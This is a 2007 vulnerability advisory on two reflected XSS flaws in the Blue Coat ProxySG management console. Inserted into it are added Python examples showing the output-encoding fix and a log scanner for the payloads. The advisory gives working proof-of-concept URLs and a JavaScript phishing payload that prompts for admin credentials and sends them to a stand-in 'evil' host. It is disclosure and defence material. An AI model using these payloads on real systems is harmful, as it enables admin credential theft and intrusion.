PR07-29: Two XSS on Blue Coat ProxySG Management Console

Vulnerability found: 23 July 2007


Vendor informed: 20 August 2007


Vulnerability fixed: 29 October 2007


Advisory publicly released: 1 November 2007


Severity: Medium


Description: 


The Blue Coat SG400 (ProxySG Management Console) is vulnerable to two reflected cross-site scripting (XSS) holes.


Vulnerable server-side script / unfiltered parameter: 
'/Secure/Local/console/install_upload_action/crl_format' / 'name'


Vulnerable server-side script / unfiltered parameter: 
'/Secure/Local/console/install_upload_from_file.htm' / 'file'


Notes:


The admin user needs to be authenticated (HTTP basic authentication) for the 
injected JavaScript to run.



Successfully tested on:


Model: Blue Coat SG400 

Software SGOS 4.2.1.6 

Software Release ID: 25173 



Proof of concept #1:


https://target:8082/Secure/Local/console/install_upload_action/crl_format?name=";<script>alert("XSS")</script>%00


Injected payload:


"<script>alert("XSS")</script>%00


Proof of concept #2:


https://target:8082/Secure/Local/console/install_upload_from_file.htm?file=<script>alert("XSS")</script><!--


Injected payload:


<script>alert("XSS")</script><!--
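The two payloads above work because the 'name' and 'file' parameters are echoed back into the page without encoding. The following Python is an added example (not code from the advisory or from Blue Coat) that decodes both proof-of-concept URLs, renders the value through a hypothetical unfiltered template and through a hardened one, and checks which output still carries live markup. The rendering functions model the reflection the advisory describes, not the console's actual template; the NUL-byte strip plus HTML-encoding is the standard fix for this bug class.

```python
import html
from urllib.parse import urlsplit, unquote

# Constructed from the advisory's two proof-of-concept URLs.
POC_URLS = {
    "name": 'https://target:8082/Secure/Local/console/install_upload_action/crl_format?name=";<script>alert("XSS")</script>%00',
    "file": 'https://target:8082/Secure/Local/console/install_upload_from_file.htm?file=<script>alert("XSS")</script><!--',
}


def extract_param(url: str, param: str) -> str:
    """Return the URL-decoded value of `param` from the query string.

    Splits on '&' only, so the ';' inside the first payload stays part of the value
    (some query parsers treat ';' as a separator and would hide it).
    """
    for pair in urlsplit(url).query.split("&"):
        key, _, value = pair.partition("=")
        if unquote(key) == param:
            return unquote(value)
    return ""


def render_unsafe(value: str) -> str:
    """Hypothetical reflection of the raw parameter into a quoted attribute.

    This is not the console's own template; it only models the unfiltered
    echo that the advisory describes.
    """
    return f'<input type="text" name="file" value="{value}">'


def render_safe(value: str) -> str:
    """Hardened form: drop NUL bytes, then HTML-encode the value including quotes."""
    cleaned = value.replace("\x00", "")
    return f'<input type="text" name="file" value="{html.escape(cleaned, quote=True)}">'


def contains_active_markup(markup: str) -> bool:
    """True if a raw <script> tag, an HTML comment opener, or a NUL byte survived into the output."""
    lowered = markup.lower()
    return "<script" in lowered or "<!--" in lowered or "\x00" in lowered


if __name__ == "__main__":
    for param, url in POC_URLS.items():
        value = extract_param(url, param)
        print(param, "unfiltered output still active:", contains_active_markup(render_unsafe(value)))
        print(param, "encoded output still active:   ", contains_active_markup(render_safe(value)))
```

Note that `html.escape(..., quote=True)` is what neutralises the leading `"` in the first payload (the quote that would otherwise close the attribute or string the value sits in), and that the NUL byte has to be removed separately because encoding does not touch it.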



A neat payload to inject instead of an alert() box would be a phishing attack 
which would forward the username and password to a third-party site (the code 
could be inserted from a third-party site). 


e.g.:


<script>
// Keep prompting until both fields are filled in
do {
        a=prompt("Blue Coat SG400: an error has occurred\nPlease enter your USERNAME","");
        b=prompt("Blue Coat SG400: an error has occurred\nPlease enter your PASSWORD","");
} while(a==null || b==null || a=="" || b=="");

// Forward the captured values to a site under the attacker's control
alert("owned!:"+a+"/"+b);window.location="http://evil/?u="+a+"&p="+b
</script><!--



Consequences: 


An attacker may be able to cause execution of malicious scripting code in the 
browser of a Blue Coat SG400 admin who clicks on a link to a Blue Coat ProxySG 
Management Console. Such code would run within the context of the target domain.


This type of attack can result in non-persistent defacement of the target site, 
or the redirection of confidential information (e.g. basic auth credentials 
stolen through a phishing attack as described in the Proof of Concept) to 
unauthorised third parties.
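Because the injected script only runs when an authenticated admin follows the link, the exploitation attempt leaves a trace in the console's own access log: a GET for one of the two vulnerable paths with a script tag, comment opener or NUL byte in the query string, issued under the admin's credentials. The following Python is an added example (not part of the advisory, and not a Blue Coat tool) that scans log lines for exactly that pattern. The sample lines are constructed in a generic combined-log style rather than Blue Coat's own access-log format, and the path prefix and markers are taken from the advisory; the scanner URL-decodes twice so that a double-encoded payload is not missed.

```python
import re
from urllib.parse import unquote

# Path prefix shared by the two vulnerable scripts named in the advisory.
CONSOLE_PREFIX = "/Secure/Local/console/"
# Markers drawn from the advisory's two payloads: script tag, comment opener, NUL terminator.
MARKERS = ("<script", "<!--", "\x00")
REQUEST_RE = re.compile(
    r'^(?P<client>\S+) \S+ (?P<user>\S+) \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"'
)

# Constructed sample lines (generic combined-log style, not Blue Coat's own format).
# Line 3 carries the second payload double-encoded to exercise the repeated decode.
SAMPLE_LOG = """\
10.0.0.5 - admin [01/Nov/2007:10:00:01 +0000] "GET /Secure/Local/console/install_upload_from_file.htm?file=cert.crl HTTP/1.1" 200 1024
10.0.0.5 - admin [01/Nov/2007:10:00:07 +0000] "GET /Secure/Local/console/install_upload_action/crl_format?name=%22;%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%00 HTTP/1.1" 200 2048
10.0.0.5 - admin [01/Nov/2007:10:00:09 +0000] "GET /Secure/Local/console/install_upload_from_file.htm?file=%253Cscript%253Ealert(%2522XSS%2522)%253C/script%253E%253C!-- HTTP/1.1" 200 2048
10.0.0.9 - - [01/Nov/2007:10:01:00 +0000] "GET /index.html?q=%3Cscript%3E HTTP/1.1" 200 512
"""


def decode_target(target: str, rounds: int = 2) -> str:
    """URL-decode up to `rounds` times so double-encoded payloads are seen in clear."""
    current = target
    for _ in range(rounds):
        decoded = unquote(current)
        if decoded == current:
            break
        current = decoded
    return current


def flag_console_requests(log_text: str) -> list:
    """Return one record per request to the management console whose query carries a marker."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        path, _, query = decode_target(m.group("target")).partition("?")
        if not path.startswith(CONSOLE_PREFIX):
            continue  # scope is the console paths from the advisory only
        found = [marker for marker in MARKERS if marker in query.lower()]
        if found:
            hits.append({
                "line": lineno,
                "client": m.group("client"),
                "user": m.group("user"),
                "path": path,
                "markers": found,
            })
    return hits


if __name__ == "__main__":
    for hit in flag_console_requests(SAMPLE_LOG):
        print(f"line {hit['line']}: {hit['user']}@{hit['client']} -> {hit['path']} markers={hit['markers']}")
```

The fourth sample line is deliberately left unflagged: a script tag against a non-console path is out of scope for this advisory, and widening the prefix is a one-line change if the same log also fronts other applications.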


Fixed in:


4.2.6.1, 5.2.2.5



References: 


http://www.procheckup.com/Vulnerability_2007.php

http://www.bluecoat.com/support/securityadvisories/advisory_cross-site_scripting_vulnerability



Credits: Adrian Pastor from ProCheckUp Ltd (www.procheckup.com)
